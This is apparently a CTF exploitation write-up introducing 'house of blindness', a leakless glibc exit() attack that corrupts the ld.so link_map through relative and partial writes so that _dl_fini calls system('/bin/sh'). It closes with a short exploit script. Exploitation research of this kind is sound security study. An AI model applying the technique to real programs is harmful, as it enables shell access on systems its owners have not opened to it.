introduction

I've recently seen this post discussing and building on research stemming from google's project zero's looks into hacking exit().

It's pretty interesting! The exit function is as ubiquitous as it is hardened. Every program needs to exit, so how libc decides to is important. Bugs form on complex surfaces, and as more things need to be done at exit (like flushing IO and unloading libraries), more complexity is introduced into exiting.

However, exit is fairly hardened. Pointer encryption prevents injecting arbitrary addresses into the exit task chain and requires an extremely difficult primitive to achieve: arbitrary read. An arbitrary read is needed not only to calculate libc base but also to leak the TLS xor key required for encrypting pointers. A weaker primitive like libc leak just isn't sufficient like it usually is.

As a result, the research made so far from binholic and project zero is, well, not where it could be. Both rely on powerful primitives to write a generalized exploit against exit, which is unfortunate considering how almost every program which uses libc relies on it. The reduction of these primitives would yield an extremely powerful exploit strategy, one that could work on any program utilizing libc's exit regardless of the actual contents of the program.

The greatest primitive to overcome is the requirement of leaks. ASLR has been a hacker's worst nightmare, increasing the complexity of exploits several times over. Many smaller exploit chains have two pieces: gain leak, use the leak to get RCE. libc is designed around forcing hackers to get a leak before they can pwn; just take a look at the recent heap updates in 2.33 which is designed to force getting a leak before the heap could be exploited, stomping out potential hacks before they can show up.

house of blindness

House of blindness is a new exploit strategy that proves leaks aren't necessary. Its entire premise stems from studying the question of:

how on earth does .fini_array even work?

It's a question even most good pwners couldn't answer. it's not a particularly hard question, it's just that most people don't care. .fini_array is a useful gimmick if you can't overwrite the GOT or need an LSB to write on a binary space address, but often its usage in CTF doesn't go beyond a gimmick.

Until now.

House of blindness isn't a conventional "overwrite .fini_array and win" style exploit. Rather, by a few clever partial writes and interesting runtime dynamic linker properties, we can trick the rtld into miscalculating where .fini is in memory. The only primitive we need is relative write.

Did I mention we can do this completely leaklessly?

abusing mmap relativity

Consider the following code:

// get size from user char *chunk = malloc(size); // get idx and byte from the user chunk[idx] = byte;

Although it may not look like it, this allows us to write a byte in libc's memory, without needing leaks! There's a couple things at play here that allows us to do that.

  • When size is sufficiently large, instead of returning a chunk from the heap, malloc "mmaps" a chunk.
  • idx can be negative or exceed size, meaning that we can write anywhere that's a known offset from the chunk.
  • Although two pages mapped by mmap isn't neccesarily contigious, they are constant offsets from each other.

Determining these offsets accurately across machines requires a deeper look into how mmap works. I go into more depth about how linkers map segments in memory in this post, but for understanding this exploit, all you need to know is that mmap chunks, libc, and ld are all consistently spaced.

Knowing this, relative write no longer becomes a stepping stone in achieving arbitrary write, but rather a powerful primitive in it's own right.

carnage in _dl_fini

Our destructor functions, .fini and .fini_array are both called in _dl_fini, a function in ld.so. _dl_fini is one of the two functions registered to be called at exit, alongside the equally interesting _IO_cleanup, but that's an interesting topic for another day.

Let's take a look at how the destructors are called.

/* Is there a destructor function? */ if (l->l_info[DT_FINI_ARRAY] != NULL || l->l_info[DT_FINI] != NULL) { /* When debugging print a message first. */ if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0)) _dl_debug_printf ("\ncalling fini: %s [%lu]\n\n", DSO_FILENAME (l->l_name), ns); /* First see whether an array is given. */ if (l->l_info[DT_FINI_ARRAY] != NULL) { ElfW(Addr) *array = (ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr); unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); while (i-- > 0) ((fini_t) array[i]) (); } /* Next try the old-style destructor. */ if (l->l_info[DT_FINI] != NULL) DL_CALL_DT_FINI (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr); }

There's a bit to unpack here! l is a link_map, a data structure that stores a whole lot of data about a specific mapped binary, like the executed binary.

A specific part of the link map is l_info, where the information collected from the .dynamic section of the ELF lives. Here's an example .dyamic section I grabbed from an ELF with Binary Ninja.

.dynamic section example

There are two pieces, a tag and a data value. The tag we're interested in is DT_FINI.

.fini, old type destructor

/* Next try the old-style destructor. */ if (l->l_info[DT_FINI] != NULL) DL_CALL_DT_FINI (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);

l->l_addr is the base of the loaded executable, where you'd see the ELF header in memory. l->l_info[DT_FINI] is a little more interesting. The value of the DT_FINI tag is the offset of the .fini section from the start of the binary. So, to figure out where the fini function is, the linker has a pointer to the DT_FINI entry in .dynamic, l_info[DT_FINI]. It'll dereference it when it comes time to get the offset.

Once it does, it'll add the offset from the base address and call fini.

How do we exploit this?

partial writes on l_info[DT_FINI]

Least significant byte writing is a common leakless tactic in pwn. The last 12 bits of any address aren't affected by ASLR, so there's one byte, the least significant byte, which will always be constant. This is because pages are always aligned to 4096-byte boundaries. This isn't any different with our .fini offset pointer. What if we did a partial write on the LSB of this pointer, causing the offset to resolve differently? What if, maybe, it resolves to something totally different?

plan of attack

Let's come up with an exploit plan. If we want a libc address in our sum of l_addr and l_info[DT_FINI], one of them needs to be a libc address. We know l_addr is a binary space address; no amount of LSB writing will change that. However, the existence of a set of writes that'll get l_info[DT_FINI] to point to a libc address is a little more open.

If we can get l_info[DT_FINI] to resolve to a libc address, we can write some constant into l_addr to shift the resulting pointer around in libc, hopefully to system.

This would absolutely ruin the link map after our call, but like, who cares?

the adjacency of .got.plt and .dynamic

We can leverage the adjacency of the .got.plt and .dynamic to get l_info[DT_FINI] to point to an entry in the GOT.

Unfortunately, the .dynamic section is big. Like, way bigger 256 bytes, meaning just overwriting the LSB isn't enough to take us to the GOT. We'll need to overwrite two least significant bytes, which unfortunately introduces 4 bits of brute-force since we only have 12 bits of consistency. Once we do that, we could set up a pretty cool strategy.

# move l_info[DT_FINI] from pointing at _fini offset (0x1298) to read in got (0x7f...) write(ld.main_link_map.l_info[DT_FINI], read_got_lsbs) # change l_addr from binary base (0x5c...) to diffence between system and read write(ld.main_link_map.l_addr, p64(libc.system - libc.read))

Ignoring how we're going to control $rdi to be /bin/sh for a second, is there a better way to get a libc address into our calculation without having to guess 4 bits of entropy?

refining our exploit with _r_debug

However, there doesn't seem to be another way to get a libc address at l_info[DT_FINI] without a two-byte write!

That's actually true. However, there's another way. The .dynamic section has one more trick up its sleeve, the DT_DEBUG entry.

When the linker loads the binary, it provides debuggers with a reference to _r_debug, a structure that contains information on the binaries link map.

A pointer in this structure is put inside of the .dynamic section for easy access! How convenient. Can we use _r_debug as a drop-in replacement for a libc address?

Yes, actually! Even though _r_debug isn't in libc, it's in ld, so it's mmap relative. Hopefully, we can write some value in

Isn't ld.so mapped after libc.so though? We can overwrite l_addr to some big number n so that .fini resolves to _r_debug+n, but what good is that if system is behind _r_debug?

Luckily, we have some tools in our toolbelt as pwners to fix this.

integer overflows

This isn't a particularly hard bug to force. If we made l_addr 0xffffffffffffffff, we'd resolve to _r_debug-1 because it only takes one more byte to overflow to the 9th byte, but that'll be thrown out because our registers aren't wide enough to read or write anything larger than 8 bytes.

I go deeper into this behaviour in this post. For our purposes though, packing our offsets as negative fixes this issue pretty neatly!

cleaning up

One caveat. Clobbering the link map, specifically l_addr, breaks a lot of stuff, mostly after our call. However, l_addr is used to call .fini_array, so we'll need to null out l_info[DT_FINI_ARRAY] for it to not be called.

Another caveat. Even with arbitrary call in libc, using one gadgets can get messy, especially when writing an exploit that should work across all libcs. It's often a lot neater if we can control what $rdi points to so we can just called system with /bin/sh.

To our luck, our destructors are called right after we unlock dl_load_lock. The source code details more about this process, but the point is we call __rtld_lock_unlock_recursive on a lock in ld.so memory. $rdi will be a pointer in ld.so!

Let's just write /bin/sh to our lock. Although there are several issues with writing random data to a mutex that would cause any self respecting concurrency engineer go off on you, for our purposes no one actually asked.

the exploit

# disable fini array from exec write(ld.address + link_map + l_info + 8 * DT_FINI_ARRAY, p64(0)) # overwrite l_info[DT_FINI]'s lsb so that it points to _r_debug write(ld.address + link_map + l_info + 8 * DT_FINI, b"\xb8") # overwrite l_addr with offset to bring _r_debug to system write( ld.address + link_map, p64(libc.symbols["system"] - ld.symbols["_r_debug"], signed=True), ) # fill _dl_load_lock with /bin/sh write(ld.symbols["_rtld_global"] + _dl_load_lock, b"/bin/sh\x00")

Although this exploit looks like total gibberish without the long and extensive build up associated with it, I think it's very worth it! General exploits are just as useful as they are cool.

the future

There's still lots of improvement to be made and much room for flexibility. Relative write isn't actually neccesary, weaker primitives would work too!

Consider global_max_fast overwrites, which allows us to write a heap pointer anywhere relative to the main area. A similar exploit could be made by forging offsets by making l_info[DT_FINI] reference the heap.

Relative byte write isn't neccessary! Unaligned 8 byte writes is more than enough to pull of the exploit, with only needing to overwrite one LSB.

Exiting is not a super big issue either! Forcing an exit by corrupting heap state and triggering heap activity is pretty trivial.

There's a whole lot more that we can use such an exploit for. That's what's so great about general exploits, they have a ton of flexibility!